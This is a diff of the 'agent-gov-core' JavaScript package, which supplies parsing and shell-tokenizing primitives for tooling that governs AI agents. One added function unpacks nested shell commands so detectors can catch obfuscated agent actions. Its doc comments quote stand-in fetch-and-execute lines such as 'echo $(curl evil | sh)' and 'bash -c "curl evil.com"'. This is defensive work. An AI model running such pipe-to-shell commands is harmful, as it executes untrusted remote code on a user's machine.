|
75
|
+
* might be authored on.
|
|
76
|
+
*/
|
|
77
|
+
const KNOWN_RUNTIMES = new Set([
|
|
78
|
+
'node', 'npx', 'npm', 'pnpm', 'yarn',
|
|
79
|
+
'python', 'python3', 'pip', 'pip3', 'pipx', 'uvx', 'uv',
|
|
80
|
+
'ruby', 'gem', 'bundle',
|
|
81
|
+
'perl', 'cpan',
|
|
82
|
+
'bash', 'sh', 'zsh', 'fish', 'powershell', 'pwsh',
|
|
83
|
+
'deno', 'bun', 'tsx', 'ts-node',
|
|
84
|
+
]);
|
|
51
85
|
function normalizePath(p) {
|
|
52
86
|
return p.trim().replace(/\\/g, '/').replace(/\/+$/, '');
|
|
53
87
|
}
|
|
@@ -59,6 +93,22 @@ function normalizePath(p) {
|
|
|
59
93
|
* (npx, uvx, pipx, node).
|
|
60
94
|
*/
|
|
61
95
|
const NEUTRAL_BOOLEAN_FLAGS = new Set(['-y', '--yes']);
|
|
96
|
+
/**
|
|
97
|
+
* Flags universally treated as boolean (no value follows) by the runners we
|
|
98
|
+
* care about. Listed so `canonicalizeArgs` doesn't greedily pair them with the
|
|
99
|
+
* next positional argument, which would conflate `--verbose pkg` with
|
|
100
|
+
* `--verbose=pkg`. Unlike NEUTRAL_BOOLEAN_FLAGS these stay in the canonical
|
|
101
|
+
* form — they're load-bearing (different identity vs. their absence) but
|
|
102
|
+
* standalone.
|
|
103
|
+
*
|
|
104
|
+
* Conservative — only flags where "takes a value" is essentially never their
|
|
105
|
+
* meaning in any CLI we'd see in an MCP config.
|
|
106
|
+
*/
|
|
107
|
+
const KNOWN_BOOLEAN_FLAGS = new Set([
|
|
108
|
+
'-v', '-V', '-q', '-h', '-d',
|
|
109
|
+
'--verbose', '--quiet', '--silent', '--debug', '--help', '--version',
|
|
110
|
+
'--force', '--dry-run', '--no-cache', '--no-color', '--no-progress', '--json',
|
|
111
|
+
]);
|
|
62
112
|
/**
|
|
63
113
|
* Sort *neutral* flag/value pairs so reordering doesn't change identity, but
|
|
64
114
|
* preserve the order of positional arguments (which are usually load-bearing —
|
|
@@ -87,6 +137,15 @@ function canonicalizeArgs(args) {
|
|
|
87
137
|
flagPairs.push([a.slice(0, eq), a.slice(eq + 1)]);
|
|
88
138
|
continue;
|
|
89
139
|
}
|
|
140
|
+
// Known-boolean flags never consume the next argument, so `--verbose pkg`
|
|
141
|
+
// leaves `pkg` as a positional rather than collapsing into a fake pair.
|
|
142
|
+
// Without this guard, reordering ['--host', 'localhost', '--verbose', 'pkg']
|
|
143
|
+
// vs ['--verbose', '--host', 'localhost', 'pkg'] produced different
|
|
144
|
+
// canonical strings because `--verbose` greedily ate the next non-flag.
|
|
145
|
+
if (KNOWN_BOOLEAN_FLAGS.has(a)) {
|
|
146
|
+
flagPairs.push([a, null]);
|
|
147
|
+
continue;
|
|
148
|
+
}
|
|
90
149
|
const next = filtered[i + 1];
|
|
91
150
|
if (next !== undefined && !next.startsWith('-')) {
|
|
92
151
|
flagPairs.push([a, next]);
|
|
@@ -0,0 +1,54 @@
|
|
|
1
|
+
/**
|
|
2
|
+
* Structured config-file parse error. Carries the 1-based line and column of
|
|
3
|
+
* the failure so consumers can emit a `*.config_syntax_error` Finding pointing
|
|
4
|
+
* at the exact spot without recomputing line numbers from the raw offset.
|
|
5
|
+
*
|
|
6
|
+
* Thrown nowhere directly — instead, {@link readJsonObjectWithSource} and
|
|
7
|
+
* {@link readTomlObject} populate the `parseError` field of their result with
|
|
8
|
+
* this type whenever they can resolve a byte offset from the underlying parser.
|
|
9
|
+
* When the underlying error lacks position info, the original `Error` is
|
|
10
|
+
* preserved unchanged.
|
|
11
|
+
*
|
|
12
|
+
* @example
|
|
13
|
+
* import { readTomlObject, ConfigParseError } from 'agent-gov-core';
|
|
14
|
+
* const { parseError } = readTomlObject('.codex/config.toml');
|
|
15
|
+
* if (parseError instanceof ConfigParseError) {
|
|
16
|
+
* emitFinding({
|
|
17
|
+
* kind: 'policy_mesh.config_syntax_error',
|
|
18
|
+
* location: { file: '.codex/config.toml', line: parseError.line, column: parseError.column },
|
|
19
|
+
* message: parseError.message,
|
|
20
|
+
* });
|
|
21
|
+
* }
|
|
22
|
+
*/
|
|
23
|
+
export declare class ConfigParseError extends Error {
    /** 1-based line of the failure. */
    readonly line: number;
    /** 1-based column of the failure. */
    readonly column: number;
    /** Offset reported by the underlying parser, from which line/column were derived. */
    readonly rawOffset: number;
    /**
     * @param message Human-readable description of the parse failure.
     * @param opts Position of the failure, plus the original parser error
     *   (`cause`) when one is available.
     */
    constructor(message: string, opts: {
        line: number;
        column: number;
        rawOffset: number;
        cause?: Error;
    });
}
|
|
34
|
+
/**
 * Convert a 0-based offset into `text` to a 1-based line and column.
 *
 * @param text Full source text the offset refers to.
 * @param offset 0-based index into `text`.
 * @returns The 1-based `line` and `column` at that offset.
 */
export declare function lineColumnOfOffset(text: string, offset: number): {
    line: number;
    column: number;
};
|
|
39
|
+
/**
 * Extract an offset from a parser error. Both this library's TOML parser
 * ("at offset N") and Node's `JSON.parse` ("at position N", or a `position`
 * property on newer runtimes) use compatible-enough formats that one helper
 * handles both.
 *
 * @param err Error raised by the underlying parser.
 * @returns The recovered offset, or `null` when the error carries no position
 *   information.
 */
export declare function extractParseOffset(err: Error): number | null;
|
|
49
|
+
/**
 * Wrap an arbitrary parser error into a {@link ConfigParseError} when offset
 * recovery is possible; otherwise return the original error unchanged.
 *
 * @param text Source text that was being parsed; used to turn the recovered
 *   offset into a line and column.
 * @param err Error raised by the underlying parser.
 * @returns A {@link ConfigParseError} carrying line/column information, or
 *   `err` itself when no offset could be recovered.
 */
export declare function toConfigParseError(text: string, err: Error): Error;
|
|
54
|
+
//# sourceMappingURL=parse-error.d.ts.map
|
|
@@ -0,0 +1,85 @@
|
|
|
1
|
+
/**
|
|
2
|
+
* Structured config-file parse error. Carries the 1-based line and column of
|
|
3
|
+
* the failure so consumers can emit a `*.config_syntax_error` Finding pointing
|
|
4
|
+
* at the exact spot without recomputing line numbers from the raw offset.
|
|
5
|
+
*
|
|
6
|
+
* Thrown nowhere directly — instead, {@link readJsonObjectWithSource} and
|
|
7
|
+
* {@link readTomlObject} populate the `parseError` field of their result with
|
|
8
|
+
* this type whenever they can resolve a byte offset from the underlying parser.
|
|
9
|
+
* When the underlying error lacks position info, the original `Error` is
|
|
10
|
+
* preserved unchanged.
|
|
11
|
+
*
|
|
12
|
+
* @example
|
|
13
|
+
* import { readTomlObject, ConfigParseError } from 'agent-gov-core';
|
|
14
|
+
* const { parseError } = readTomlObject('.codex/config.toml');
|
|
15
|
+
* if (parseError instanceof ConfigParseError) {
|
|
16
|
+
* emitFinding({
|
|
17
|
+
* kind: 'policy_mesh.config_syntax_error',
|
|
18
|
+
* location: { file: '.codex/config.toml', line: parseError.line, column: parseError.column },
|
|
19
|
+
* message: parseError.message,
|
|
20
|
+
* });
|
|
21
|
+
* }
|
|
22
|
+
*/
|
|
23
|
+
export class ConfigParseError extends Error {
    /** 1-based line of the failure. */
    line;
    /** 1-based column of the failure. */
    column;
    /** Offset reported by the underlying parser. */
    rawOffset;
    /**
     * @param message Human-readable description of the parse failure.
     * @param opts `{ line, column, rawOffset, cause? }` describing where the
     *   failure happened and, optionally, the original parser error.
     */
    constructor(message, opts) {
        super(message);
        const { line, column, rawOffset, cause } = opts;
        this.name = 'ConfigParseError';
        this.line = line;
        this.column = column;
        this.rawOffset = rawOffset;
        // Assigned by hand (rather than via the Error options bag) so the
        // property is only present when a cause was actually supplied.
        if (cause) {
            this.cause = cause;
        }
    }
}
|
|
39
|
+
/**
 * Translate a 0-based offset into `text` into a 1-based line/column pair.
 *
 * Offsets outside `[0, text.length]` are clamped to the nearest end. Only `\n`
 * starts a new line; every other character (including `\r`) advances the column.
 *
 * @param text Full source text.
 * @param offset 0-based index into `text`.
 * @returns `{ line, column }`, both 1-based.
 */
export function lineColumnOfOffset(text, offset) {
    const clamped = Math.max(0, Math.min(offset, text.length));
    // Everything before the offset, cut into rows: the number of rows is the
    // line, and the length of the last row is how far into that line we are.
    // `Math.ceil` keeps a non-integer offset equivalent to an `i < offset` scan.
    const rows = text.slice(0, Math.ceil(clamped)).split('\n');
    const lastRow = rows[rows.length - 1];
    return { line: rows.length, column: lastRow.length + 1 };
}
|
|
55
|
+
/**
 * Extract an offset from a parser error. Both this library's TOML parser
 * ("at offset N") and Node's `JSON.parse` ("at position N") put the position
 * in the message, so one helper handles both. A numeric `position` property on
 * the error is used as a fallback.
 *
 * When the message contains several "at offset N" / "at position N" fragments,
 * the LAST one wins: the TOML parser appends the position after text that can
 * include user-controlled key names (e.g. `Duplicate key: <key> at offset N`),
 * so an earlier match may come from the key rather than from the parser.
 *
 * @param err Error raised by the underlying parser.
 * @returns The recovered offset, or `null` when the error carries no position
 *   information.
 */
export function extractParseOffset(err) {
    let fromMessage = null;
    // `String(...)` keeps the original tolerance for a missing `message`.
    for (const m of String(err.message).matchAll(/at (?:offset|position)\s+(\d+)/gi)) {
        fromMessage = Number.parseInt(m[1], 10);
    }
    if (fromMessage !== null)
        return fromMessage;
    // Some runtimes attach a numeric `position` to the SyntaxError instead.
    const maybePos = err.position;
    if (typeof maybePos === 'number')
        return maybePos;
    return null;
}
|
|
74
|
+
/**
 * Upgrade a parser error to a {@link ConfigParseError} when its offset can be
 * recovered; otherwise hand back the original error untouched.
 *
 * @param text Source text that was being parsed; used to map the offset to a
 *   line and column.
 * @param err Error raised by the underlying parser.
 * @returns A {@link ConfigParseError} (with `err` as its cause) or `err` itself.
 */
export function toConfigParseError(text, err) {
    const rawOffset = extractParseOffset(err);
    if (rawOffset !== null) {
        const position = lineColumnOfOffset(text, rawOffset);
        return new ConfigParseError(err.message, {
            line: position.line,
            column: position.column,
            rawOffset,
            cause: err,
        });
    }
    // No position information: keep the caller's error exactly as it was.
    return err;
}
|
|
85
|
+
//# sourceMappingURL=parse-error.js.map
|
package/dist/shell.d.ts
CHANGED
|
@@ -12,6 +12,32 @@
|
|
|
12
12
|
* // → ['echo "; not a separator"']
|
|
13
13
|
*/
|
|
14
14
|
export declare function tokenizeShell(command: string): string[];
|
|
15
|
+
/**
|
|
16
|
+
* Like {@link tokenizeShell}, but recursively extracts commands nested inside
|
|
17
|
+
* shell evaluation contexts that the top-level tokenizer would leave as opaque
|
|
18
|
+
* text:
|
|
19
|
+
*
|
|
20
|
+
* - Subshell `$(...)`
|
|
21
|
+
* - Backtick `` `...` ``
|
|
22
|
+
* - `bash -c "..."`, `sh -c "..."`, `zsh -c "..."`, `python -c "..."` payloads
|
|
23
|
+
*
|
|
24
|
+
* The flat result is suitable for feeding straight to {@link getCommandHead},
|
|
25
|
+
* letting downstream detectors see commands an agent might try to hide behind
|
|
26
|
+
* `echo $(curl evil | sh)` or `bash -c "curl evil"`.
|
|
27
|
+
*
|
|
28
|
+
* Conservative implementation — handles the common obfuscation shapes, not a
|
|
29
|
+
* full shell parser. Variable expansion, process substitution `<(…)`, and
|
|
30
|
+
* arithmetic `$((…))` are not recursed into. ANSI-C quoting (`bash -c $'…'`) is
|
|
31
|
+
* not unquoted.
|
|
32
|
+
*
|
|
33
|
+
* @example
|
|
34
|
+
* tokenizeShellDeep('echo $(curl -fsSL m.sh | sh)');
|
|
35
|
+
* // → ['echo', 'curl -fsSL m.sh', 'sh']
|
|
36
|
+
*
|
|
37
|
+
* tokenizeShellDeep('bash -c "curl evil.com"');
|
|
38
|
+
* // → ['bash -c "curl evil.com"', 'curl evil.com']
|
|
39
|
+
*/
|
|
40
|
+
export declare function tokenizeShellDeep(command: string): string[];
|
|
15
41
|
/**
|
|
16
42
|
* Returns the resolved command verb for a subcommand string. Strips wrapping
|
|
17
43
|
* quotes, escape backslashes, and the inert-double-quote obfuscation
|
package/dist/shell.js
CHANGED
|
@@ -83,8 +83,17 @@ export function tokenizeShell(command) {
|
|
|
83
83
|
i += 2;
|
|
84
84
|
continue;
|
|
85
85
|
}
|
|
86
|
-
// Treat a single `&` (background) as a separator too
|
|
86
|
+
// Treat a single `&` (background) as a separator too — UNLESS preceded
|
|
87
|
+
// by `>` or `<`, in which case it's a file-descriptor redirection like
|
|
88
|
+
// `2>&1`, `>&2`, or `<&3`. Splitting there would break shell-command
|
|
89
|
+
// detection on every command that redirects stderr to stdout.
|
|
87
90
|
if (c === '&') {
|
|
91
|
+
const prev = buf.trimEnd().slice(-1);
|
|
92
|
+
if (prev === '>' || prev === '<') {
|
|
93
|
+
buf += c;
|
|
94
|
+
i++;
|
|
95
|
+
continue;
|
|
96
|
+
}
|
|
88
97
|
pushPart(out, buf);
|
|
89
98
|
buf = '';
|
|
90
99
|
i++;
|
|
@@ -101,6 +110,206 @@ function pushPart(out, part) {
|
|
|
101
110
|
if (trimmed !== '')
|
|
102
111
|
out.push(trimmed);
|
|
103
112
|
}
|
|
113
|
+
/**
|
|
114
|
+
* Like {@link tokenizeShell}, but recursively extracts commands nested inside
|
|
115
|
+
* shell evaluation contexts that the top-level tokenizer would leave as opaque
|
|
116
|
+
* text:
|
|
117
|
+
*
|
|
118
|
+
* - Subshell `$(...)`
|
|
119
|
+
* - Backtick `` `...` ``
|
|
120
|
+
* - `bash -c "..."`, `sh -c "..."`, `zsh -c "..."`, `python -c "..."` payloads
|
|
121
|
+
*
|
|
122
|
+
* The flat result is suitable for feeding straight to {@link getCommandHead},
|
|
123
|
+
* letting downstream detectors see commands an agent might try to hide behind
|
|
124
|
+
* `echo $(curl evil | sh)` or `bash -c "curl evil"`.
|
|
125
|
+
*
|
|
126
|
+
* Conservative implementation — handles the common obfuscation shapes, not a
|
|
127
|
+
* full shell parser. Variable expansion, process substitution `<(…)`, and
|
|
128
|
+
* arithmetic `$((…))` are not recursed into. ANSI-C quoting (`bash -c $'…'`) is
|
|
129
|
+
* not unquoted.
|
|
130
|
+
*
|
|
131
|
+
* @example
|
|
132
|
+
* tokenizeShellDeep('echo $(curl -fsSL m.sh | sh)');
|
|
133
|
+
* // → ['echo', 'curl -fsSL m.sh', 'sh']
|
|
134
|
+
*
|
|
135
|
+
* tokenizeShellDeep('bash -c "curl evil.com"');
|
|
136
|
+
* // → ['bash -c "curl evil.com"', 'curl evil.com']
|
|
137
|
+
*/
|
|
138
|
+
export function tokenizeShellDeep(command) {
    // Nesting deeper than this is treated as pathological and ignored.
    const MAX_DEPTH = 8;
    const collected = [];
    const alreadyEmitted = new Set();
    function walk(text, level) {
        if (level > MAX_DEPTH)
            return;
        // Pull nested payloads out of the WHOLE text before tokenizing it:
        // `tokenizeShell` splits on `|` regardless of paren depth, so a
        // `$(a | b)` body would otherwise already be cut in two.
        const payloads = extractNestedShellPayloads(text);
        tokenizeShell(text).forEach((piece) => {
            if (alreadyEmitted.has(piece))
                return;
            alreadyEmitted.add(piece);
            collected.push(piece);
        });
        // Recurse only after this level's own tokens have been emitted, so the
        // output lists outer commands before the commands nested inside them.
        payloads.forEach((payload) => walk(payload, level + 1));
    }
    walk(command, 0);
    return collected;
}
|
|
161
|
+
/**
 * Return all shell-evaluation payloads embedded in a single subcommand:
 *   - `$(…)` and `` `…` `` bodies
 *   - `<interpreter> -c <arg>` payloads, where the interpreter is one of
 *     bash, sh, zsh, ksh, dash, ash, fish, python, python3, perl, ruby, node
 * The payloads are returned UNQUOTED but otherwise raw.
 *
 * Quote tracking:
 *   - Inside single quotes nothing is interpreted, so the walk skips to the
 *     closing `'`.
 *   - A `'` inside double quotes is an ordinary character. It must not open a
 *     single-quoted region, or `echo "it's $(cmd)"` would hide `$(cmd)`.
 *   - A backslash followed by `"`, `'` or `\` is consumed as a pair so an
 *     escaped quote does not flip the quote state. Other escapes (notably
 *     `\$` and `` \` ``) are deliberately NOT consumed, so substitutions are
 *     still reported even when escaped.
 *
 * @param subcommand Raw command text to scan.
 * @returns The nested payload strings, in the order they appear.
 */
function extractNestedShellPayloads(subcommand) {
    const found = [];
    const len = subcommand.length;
    // Sticky (`y`) so the pattern can be anchored at the walk position via
    // `lastIndex` instead of slicing the remaining text at every boundary.
    const dashCMatcher = /(?:bash|sh|zsh|ksh|dash|ash|fish|python3?|perl|ruby|node)\s+-c\s+/y;
    const boundaryChar = /[\s;|&]/;
    let i = 0;
    let inSingle = false;
    let inDouble = false;
    while (i < len) {
        const c = subcommand[i];
        // Plain single quotes: nothing inside is shell-interpreted.
        if (inSingle) {
            if (c === "'")
                inSingle = false;
            i++;
            continue;
        }
        // Escaped quote or backslash: skip the pair so it cannot toggle state.
        if (c === '\\') {
            const escaped = subcommand[i + 1];
            if (escaped === '"' || escaped === "'" || escaped === '\\') {
                i += 2;
                continue;
            }
        }
        // A single quote only opens a quoted region OUTSIDE double quotes.
        if (c === "'" && !inDouble) {
            inSingle = true;
            i++;
            continue;
        }
        // Inside double quotes, `$(…)` and backticks STILL evaluate, so the
        // walk keeps scanning and only tracks where the region ends.
        if (c === '"') {
            inDouble = !inDouble;
            i++;
            continue;
        }
        // $(...)
        if (c === '$' && subcommand[i + 1] === '(') {
            const body = readBalanced(subcommand, i + 2, '(', ')');
            if (body !== null) {
                found.push(body.content);
                i = body.endIndex;
                continue;
            }
        }
        // Backticks
        if (c === '`') {
            const close = subcommand.indexOf('`', i + 1);
            if (close !== -1) {
                found.push(subcommand.slice(i + 1, close));
                i = close + 1;
                continue;
            }
        }
        // `bash -c "..."` and friends — checked only OUTSIDE double-quoted
        // regions so quoted data such as `echo "bash -c \"curl evil\""` doesn't
        // trigger. Match boundary: start-of-string, or right after whitespace
        // or a chain separator.
        if (!inDouble) {
            const atBoundary = i === 0 || boundaryChar.test(subcommand[i - 1]);
            if (atBoundary) {
                dashCMatcher.lastIndex = i;
                const dashCMatch = dashCMatcher.exec(subcommand);
                if (dashCMatch) {
                    const afterFlag = i + dashCMatch[0].length;
                    const payload = readQuotedArg(subcommand, afterFlag);
                    if (payload !== null)
                        found.push(payload);
                    // Resume at the argument itself; the next iteration sees
                    // its opening quote and updates the quote state.
                    i = afterFlag;
                    continue;
                }
            }
        }
        i++;
    }
    return found;
}
|
|
242
|
+
/**
 * Read a balanced `open`/`close` body starting at `start` (already past the
 * opening delimiter).
 *
 * Delimiters inside single- or double-quoted regions are ignored. A `'` inside
 * double quotes is an ordinary character, and a backslash followed by `"`, `'`
 * or `\` is consumed as a pair, so neither can corrupt the quote state and
 * make the closing delimiter unreachable.
 *
 * @param input Text being scanned.
 * @param start Index of the first character after the opening delimiter.
 * @param open Opening delimiter character (increments nesting depth).
 * @param close Closing delimiter character (decrements nesting depth).
 * @returns `{ content, endIndex }` where `content` is the text between the
 *   delimiters and `endIndex` is the index just past the closing delimiter, or
 *   `null` when the body is never closed.
 */
function readBalanced(input, start, open, close) {
    let depth = 1;
    let inSingle = false;
    let inDouble = false;
    for (let i = start; i < input.length; i++) {
        const c = input[i];
        if (inSingle) {
            if (c === "'")
                inSingle = false;
            continue;
        }
        // Escaped quote or backslash: skip the escaped character as well.
        if (c === '\\') {
            const escaped = input[i + 1];
            if (escaped === '"' || escaped === "'" || escaped === '\\') {
                i++;
                continue;
            }
        }
        if (c === '"') {
            inDouble = !inDouble;
            continue;
        }
        // Everything else inside double quotes — including `'` and the
        // delimiters themselves — is literal text for balancing purposes.
        if (inDouble)
            continue;
        if (c === "'") {
            inSingle = true;
            continue;
        }
        if (c === open) {
            depth++;
        }
        else if (c === close) {
            depth--;
            if (depth === 0)
                return { content: input.slice(start, i), endIndex: i + 1 };
        }
    }
    return null;
}
|
|
279
|
+
/**
 * Read the argument that begins at or after `start`, skipping leading spaces
 * and tabs, and return its contents without the surrounding quotes.
 *
 *   - Double-quoted: a backslash makes the following character literal.
 *   - Single-quoted: contents are taken verbatim.
 *   - Unquoted: the token runs up to the next space or tab.
 *
 * @param input Text being scanned.
 * @param start Index at which to start looking for the argument.
 * @returns The unquoted argument, or `null` when there is no argument or a
 *   quoted argument is never closed.
 */
function readQuotedArg(input, start) {
    const isBlank = (ch) => ch === ' ' || ch === '\t';
    let pos = start;
    while (pos < input.length && isBlank(input[pos]))
        pos++;
    if (pos >= input.length)
        return null;
    const quote = input[pos];
    if (quote !== '"' && quote !== "'") {
        // Bare token — everything up to the next blank.
        let end = pos;
        while (end < input.length && !isBlank(input[end]))
            end++;
        return input.slice(pos, end);
    }
    // Only double quotes honour backslash escapes.
    const honoursEscapes = quote === '"';
    const pieces = [];
    for (let k = pos + 1; k < input.length; k++) {
        const ch = input[k];
        if (honoursEscapes && ch === '\\' && k + 1 < input.length) {
            pieces.push(input[k + 1]);
            k++; // also step over the escaped character
            continue;
        }
        if (ch === quote)
            return pieces.join('');
        pieces.push(ch);
    }
    // Ran off the end without finding the closing quote.
    return null;
}
|
|
104
313
|
/**
|
|
105
314
|
* Returns the resolved command verb for a subcommand string. Strips wrapping
|
|
106
315
|
* quotes, escape backslashes, and the inert-double-quote obfuscation
|
package/dist/toml.js
CHANGED
|
@@ -1,4 +1,5 @@
|
|
|
1
1
|
import { readFileSync } from 'node:fs';
|
|
2
|
+
import { toConfigParseError } from './parse-error.js';
|
|
2
3
|
export function readTomlObject(path) {
|
|
3
4
|
const text = readFileSync(path, 'utf8');
|
|
4
5
|
try {
|
|
@@ -6,7 +7,7 @@ export function readTomlObject(path) {
|
|
|
6
7
|
return { value: parsed, toml: parsed, text };
|
|
7
8
|
}
|
|
8
9
|
catch (err) {
|
|
9
|
-
return { value: undefined, toml: undefined, text, parseError: err };
|
|
10
|
+
return { value: undefined, toml: undefined, text, parseError: toConfigParseError(text, err) };
|
|
10
11
|
}
|
|
11
12
|
}
|
|
12
13
|
/**
|
|
@@ -122,11 +123,11 @@ class TomlParser {
|
|
|
122
123
|
// TOML spec violation. Without this guard, `[foo]` silently descended
|
|
123
124
|
// into the last `[[foo]]` entry and let writes leak into it.
|
|
124
125
|
if (this.aotPaths.has(path)) {
|
|
125
|
-
throw new Error(`Cannot redefine array-of-tables [[${keys.join('.')}]] as a standard table [${keys.join('.')}]`);
|
|
126
|
+
throw new Error(`Cannot redefine array-of-tables [[${keys.join('.')}]] as a standard table [${keys.join('.')}] at offset ${this.pos}`);
|
|
126
127
|
}
|
|
127
128
|
const table = this.descendTablePath(keys, /*forHeader*/ true);
|
|
128
129
|
if (this.definedTables.has(path)) {
|
|
129
|
-
throw new Error(`Duplicate table definition: [${keys.join('.')}]`);
|
|
130
|
+
throw new Error(`Duplicate table definition: [${keys.join('.')}] at offset ${this.pos}`);
|
|
130
131
|
}
|
|
131
132
|
this.definedTables.add(path);
|
|
132
133
|
this.current = table;
|
|
@@ -153,6 +154,17 @@ class TomlParser {
|
|
|
153
154
|
else if (!Array.isArray(arr)) {
|
|
154
155
|
throw new Error(`Key ${keys.join('.')} is not an array-of-tables`);
|
|
155
156
|
}
|
|
157
|
+
// Each new array entry resets the "already defined" status of any subtables
|
|
158
|
+
// declared under this AOT path. TOML spec permits the same subtable header
|
|
159
|
+
// (`[fruits.physical]`) to reappear under each fresh `[[fruits]]` entry — it
|
|
160
|
+
// binds to the current array entry. Without this clearing, the v0.4.2
|
|
161
|
+
// definedTables guard rejected the second [fruits.physical] as a duplicate.
|
|
162
|
+
const aotPathPrefix = keys.join(this.PATH_KEY_SEPARATOR) + this.PATH_KEY_SEPARATOR;
|
|
163
|
+
for (const definedPath of this.definedTables) {
|
|
164
|
+
if (definedPath.startsWith(aotPathPrefix)) {
|
|
165
|
+
this.definedTables.delete(definedPath);
|
|
166
|
+
}
|
|
167
|
+
}
|
|
156
168
|
const newTable = {};
|
|
157
169
|
arr.push(newTable);
|
|
158
170
|
this.current = newTable;
|
|
@@ -248,7 +260,7 @@ class TomlParser {
|
|
|
248
260
|
}
|
|
249
261
|
const lastKey = keys[keys.length - 1];
|
|
250
262
|
if (Object.prototype.hasOwnProperty.call(node, lastKey)) {
|
|
251
|
-
throw new Error(`Duplicate key: ${keys.join('.')}`);
|
|
263
|
+
throw new Error(`Duplicate key: ${keys.join('.')} at offset ${this.pos}`);
|
|
252
264
|
}
|
|
253
265
|
node[lastKey] = value;
|
|
254
266
|
this.expectLineEnd();
|
|
@@ -322,9 +334,18 @@ class TomlParser {
|
|
|
322
334
|
const c = this.src[this.pos];
|
|
323
335
|
if (c === '\\') {
|
|
324
336
|
this.pos++;
|
|
325
|
-
//
|
|
326
|
-
|
|
337
|
+
// Line-ending backslash: per TOML spec, a `\` followed by *any amount
|
|
338
|
+
// of inline whitespace* (spaces/tabs) and then a newline strips the
|
|
339
|
+
// newline and trims leading whitespace on the next line. Peek past
|
|
340
|
+
// trailing inline whitespace before deciding whether this is a
|
|
341
|
+
// line-ending backslash or a regular escape.
|
|
342
|
+
let peek = this.pos;
|
|
343
|
+
while (peek < this.len && (this.src[peek] === ' ' || this.src[peek] === '\t')) {
|
|
344
|
+
peek++;
|
|
345
|
+
}
|
|
346
|
+
const next = this.src[peek];
|
|
327
347
|
if (next === '\n' || next === '\r' || next === undefined) {
|
|
348
|
+
this.pos = peek;
|
|
328
349
|
while (this.pos < this.len &&
|
|
329
350
|
(this.src[this.pos] === ' ' ||
|
|
330
351
|
this.src[this.pos] === '\t' ||
|
|
@@ -480,7 +501,7 @@ class TomlParser {
|
|
|
480
501
|
// Without this guard, `{ host = "a", host = "b" }` silently parsed as
|
|
481
502
|
// `{ host: "b" }` instead of raising.
|
|
482
503
|
if (Object.prototype.hasOwnProperty.call(node, leaf)) {
|
|
483
|
-
throw new Error(`Duplicate key in inline table: ${keys.join('.')}`);
|
|
504
|
+
throw new Error(`Duplicate key in inline table: ${keys.join('.')} at offset ${this.pos}`);
|
|
484
505
|
}
|
|
485
506
|
node[leaf] = value;
|
|
486
507
|
this.skipInlineWhitespace();
|
package/package.json
CHANGED
|
@@ -1,6 +1,6 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "agent-gov-core",
|
|
3
|
-
"version": "0.
|
|
3
|
+
"version": "0.5.0",
|
|
4
4
|
"description": "Shared primitives for the AI-agent governance suite: Finding schema, JSONC/TOML readers, line locators, MCP command normalization, shell tokenization, and GitHub Action helpers.",
|
|
5
5
|
"type": "module",
|
|
6
6
|
"main": "./dist/index.js",
|
|
@@ -41,6 +41,10 @@
|
|
|
41
41
|
}
|
|
42
42
|
},
|
|
43
43
|
"fingerprint": { "type": "string" },
|
|
44
|
+
"salientKey": {
|
|
45
|
+
"type": "string",
|
|
46
|
+
"description": "Optional discriminator that participates in the fingerprint hash. Set when a single (kind, file, line) site can produce multiple distinct findings (e.g. two suspicious imports on one line). Use a stable value — package name, server name, rule id — not a timestamp."
|
|
47
|
+
},
|
|
44
48
|
"data": { "type": "object" }
|
|
45
49
|
}
|
|
46
50
|
}
|